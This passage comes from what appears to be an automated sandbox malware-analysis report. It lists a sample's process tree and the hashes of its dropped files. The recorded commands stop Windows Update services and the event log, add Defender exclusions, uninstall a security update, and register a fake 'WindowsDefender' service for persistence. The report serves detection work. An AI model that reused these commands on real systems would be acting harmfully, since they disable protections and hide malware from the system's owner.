                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:2848
                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Power Settings
                                                                                                                                                                        PID:2892
                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Power Settings
                                                                                                                                                                        PID:4780
                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Power Settings
                                                                                                                                                                        PID:3712
                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Power Settings
                                                                                                                                                                        PID:4264
                                                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:1576
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe delete "WindowsDefender"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:3032
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\WindowsDefender\windows32.exe" start= "auto"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:2644
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:1784
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe start "WindowsDefender"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:3684
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\updater.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1900
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3628
                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3828
                                                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3976
                                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4176
                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4924
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:616
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1932
                                                                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3928
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1912
                                                                                                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:2948
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2988
                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:404
                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3620
                                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4224
                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4832
                                                                                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1472
                                                                                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:2748
                                                                                                                                                                                                • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                                  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4624
                                                                                                                                                                                                  • C:\ProgramData\WindowsDefender\windows32.exe
                                                                                                                                                                                                    C:\ProgramData\WindowsDefender\windows32.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:4252
                                                                                                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:2404
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4576
                                                                                                                                                                                                        • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:456
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:2888
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:324
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:2316
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:1772
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:2712
                                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Power Settings
                                                                                                                                                                                                          PID:428
                                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Power Settings
                                                                                                                                                                                                          PID:396
                                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Power Settings
                                                                                                                                                                                                          PID:3328
                                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Power Settings
                                                                                                                                                                                                          PID:2092
                                                                                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                          C:\Windows\system32\dialer.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3912
                                                                                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                            C:\Windows\system32\dialer.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1008
                                                                                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                              dialer.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:2632

                                                                                                                                                                                                          Network

                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_brotli.pyd

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            801KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            3f4ff03457de6d751c912b43231ddcc2

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            e872d0c0349aeae3a5016671565a3364c1e21f0f

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            6c00e3c64c4b30d127474bf7dee5250f5123c91b992b1ad04482223de510f37b

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            1b04b65914b9ac51fd9d3a9433d9767e0ea0ca44c5cb1707175a3a2104b0316316026233b217ee272290d7b0d3c05b798cbb524a5fabddef492e05d0b6f52194

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            7c69cb3cb3182a97e3e9a30d2241ebed

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            1b8754ff57a14c32bcadc330d4880382c7fffc93

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            12a84bacb071b1948a9f751ac8d0653ba71a8f6b217a69fe062608e532065c20

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            96dbabbc6b98d473cbe06dcd296f6c6004c485e57ac5ba10560a377393875192b22df8a7103fe4a22795b8d81b8b0ae14ce7646262f87cb609b9e2590a93169e

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            78KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            fd1cfe0f0023c5780247f11d8d2802c9

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            5b29a3b4c6edb6fa176077e1f1432e3b0178f2bc

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            258a5f0b4d362b2fed80b24eeabcb3cdd1602e32ff79d87225da6d15106b17a6

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            b304a2e56829a557ec401c6fdda78d6d05b7495a610c1ed793d6b25fc5af891cb2a1581addb27ab5e2a6cb0be24d9678f67b97828015161bc875df9b7b5055ae

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            151KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            34b1d4db44fc3b29e8a85dd01432535f

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3189c207370622c97c7c049c97262d59c6487983

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e4aa33b312cec5aa5a0b064557576844879e0dccc40047c9d0a769a1d03f03f6

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f5f3dcd48d01aa56bd0a11eee02c21546440a59791ced2f85cdac81da1848ef367a93ef4f10fa52331ee2edea93cbcc95a0f94c0ccefa5d19e04ae5013563aee

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            285KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            d3e74c9d33719c8ab162baa4ae743b27

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            7a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-1_1.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            3.2MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            89511df61678befa2f62f5025c8c8448

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            df3961f833b4964f70fcf1c002d9fd7309f53ef8

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            296426e7ce11bc3d1cfa9f2aeb42f60c974da4af3b3efbeb0ba40e92e5299fdf

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            9af069ea13551a4672fdd4635d3242e017837b76ab2815788148dd4c44b4cf3a650d43ac79cd2122e1e51e01fb5164e71ff81a829395bdb8e50bb50a33f0a668

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-1_1.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            674KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            50bcfb04328fec1a22c31c0e39286470

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3a1b78faf34125c7b8d684419fa715c367db3daa

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            fddd0da02dcd41786e9aa04ba17ba391ce39dae6b1f54cfa1e2bb55bc753fce9

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            370e6dfd318d905b79baf1808efbf6da58590f00006513bdaaed0c313f6fa6c36f634ea3b05f916cee59f4db25a23dd9e6f64caf3c04a200e78c193027f57685

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            28KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            0e3cf5d792a3f543be8bbc186b97a27a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            50f4c70fce31504c6b746a2c8d9754a16ebc8d5e

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            c7ffae6dc927cf10ac5da08614912bb3ad8fc52aa0ef9bc376d831e72dd74460

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            224b42e05b4dbdf7275ee7c5d3eb190024fc55e22e38bd189c1685efee2a3dd527c6dfcb2feeec525b8d6dc35aded1eac2423ed62bb2599bb6a9ea34e842c340

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\VCRUNTIME140.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            96KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            f12681a472b9dd04a812e16096514974

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\_ctypes.pyd

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            57KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            38fb83bd4febed211bd25e19e1cae555

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            4541df6b69d0d52687edb12a878ae2cd44f82db6

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            9313c86e7bae859f0174a1c8b6aba58b

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            dce67fd1da5da8dc4ba406c544e55a83d6536cc9

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            af9675ac90bae8a0d8623f6fdaff9d39e1b8810e8e46a5b044baaa3396e745b3

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            2ec64fce4a86bc52dc6c485fd94d203020617df92698ca91ae25c4901984899e21c7dd92881ec52d6850edfa547701aab9b0cd1b8d076e6779b1a13324cdd3a4

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            854458ad55c39a9dfd1e350a51be02b8

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            5013cf58de5a0b55e026ace967e9842b3b131c2a

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f918b0c45f59b2cb29f1eb3653d2f2679095e85e082a1198c933a76edf1f33ef

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            faa41a5031033f7e86efebc47777f915e95617f4b05d93833066c206d9c092855d8072c7bd142898f5a2bd1f94b646d98933302ddeb5a9ca0d5930c7b2241b98

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            7ad2034acd0f296fe9eed320e5ad7591

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            fe1b217e3f4567905968f7a3d48a7611e3cf3f7b

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            0d859a866d1bcefe1a1bc5adb88dcf2765567ecc31dfb4e472b512d033d88bb4

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            06d017b0ef9d081bc627f7f33d51ef2fe64e2cc5023204771032c4ed7bf26c0c6106b69d78f7bdd880fa59e8e4048b2da8848784bc92d7780155df140c952420

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            12ea48ce605ebb204a21ae7d86db3417

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            5fb0ff9ba4105cd76ee4470ae4cad0a39ae68c66

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            189bbbd739526a986e53518865e741cde8c5967aacd5ed687408cec3d8781f1c

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            39b486fb72c9dff4e391673a872e957dbf0545d4d26914d0b0a475624e40b4feec3a9a17549e87ba806b1a90bf6f7784a187c506daa1db5201561cef90ff6e81

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-fibers-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            201ff3cd2ffe7d222f46574d4ac40a70

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            b43f19bbb8fd1c8aa05ba67dea38a7785dbe57b6

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            b83a71978215fdba477c4ea61340168947a1021324d118e6b7159054985f2d1a

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            3f99d7b501c1db470a6d91af856ebbede05522acb5763d928f4fb28c74db2339b46df108745ed8ebd8c6c1298d9495358c245d188f055638b0d6dd568fa596d2

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            25KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            4b328f140a3ae7fedb21ca50cc23d938

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            9e71b4c2cf030a644d2050188c4b77e638c0ee14

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e55b200643e8b078e7f5eb0c97de44fead21b11d06590ebedbcb84214d063345

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            4c349f45ca4db4f1247aa405e5627f22b7ccfe66234d8d970475e71471ebb251f7a0f781a33d0e4ec893f86653b0a1c8508adf576e923d0ce86b43f552204614

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            4a060eec454c222a5381cd359dc00b81

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            21e1bc115d04a74779e955ea16a16bd71454d9bb

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e6b2b05e14a6c6f5381e8f4c7f4fd28a499246fb4c8eafe1f08014b9273d70df

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            16fb1f4ccdad05d07feb62e0cd078401f4023f9fab0fb15e52b927ca413e65eb32c2932ba59dbfa7f7ee0e8a8053748e27f2757e82e600db812271aa44a9433c

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            20KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            50abf0a7ee67f00f247bada185a7661c

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            0cddac9ac4db3bf10a11d4b79085ef9cb3fb84a1

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f957a4c261506484b53534a9be8931c02ec1a349b3f431a858f8215cecfec3f7

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            c2694bb5d103baff1264926a04d2f0fe156b8815a23c3748412a81cc307b71a9236a0e974b5549321014065e393d10228a0f0004df9ba677f03b5d244a64b528

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            4166d703abc9c6de65d5b269d3a5425e

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            16bcd7191312b94bdf38368d188e5a5cc479a36c

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            0a351c2a2889a42886017e7dbcf75f45e3cb24d2f55e72205624272487e4a056

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f722dba410cab727c753e9cce0bc47663e22f45828f5df0bac5bd6331497a2f15f6d9330b5203d3ff735f1ce6397e63c1b21d3ea6c5ceab817b5f83ec296882b

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            993b5bc35dac959bed58b77fe42ac77a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            2abad159cbab86ff423d6446143427daab751366

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            b998ff8d173c34505e1d5984134282866de910b09919cf9a322fce760b75c80b

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            ca19e949dcc8460af53c9dad17995a0cbffd971bb731b7fcb53bb9384d227357926231c9fadfaa5aef09055bebae9d5c23ee73eb6eca04d6a52a3df0847e10ab

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            0b65672b91c6a12d769dd777f810b149

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            2d527b45dcbe653a91e10365891c7e589f5e51e0

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            c09eb307b2eb747b73c516267a99a23bb73204452326d41bdeb6f43598f6d62e

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f090bb0b8f3616cf2d77ff25523bc823918e1452f626a1298c95003def1867c785566a4e85ccd7f5a20f14631caec5dd392777db2d00368c3fdf3597e0f51788

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            259b4186004bb41e706dd781e29f5c5b

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            85751d31fe233ed51c46466f214f497d01be8d87

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            b3ba83880986f2522d05a88c52fe69eda9c9fadbc5192a063e36bba777cc877f

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f8a06252e96f40965668c978c4808305d424de698f47f420643d713751926636f2049dd34c8156ba5bbbf5a5b2f4d5c19a978cf27d3aaebd728d7a3de8f0afa2

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI26362\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            21KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            4c26932f8f1f490017add31f5ec0a533

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            0da01a7c89b506fe3fd939344bb51b976efb3207

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            dd3843c2e46b4e926c36150d614efe02ca0ebc1f767f64f471568adc35c2ef23

                                                                                                                                                                                                            SHA512

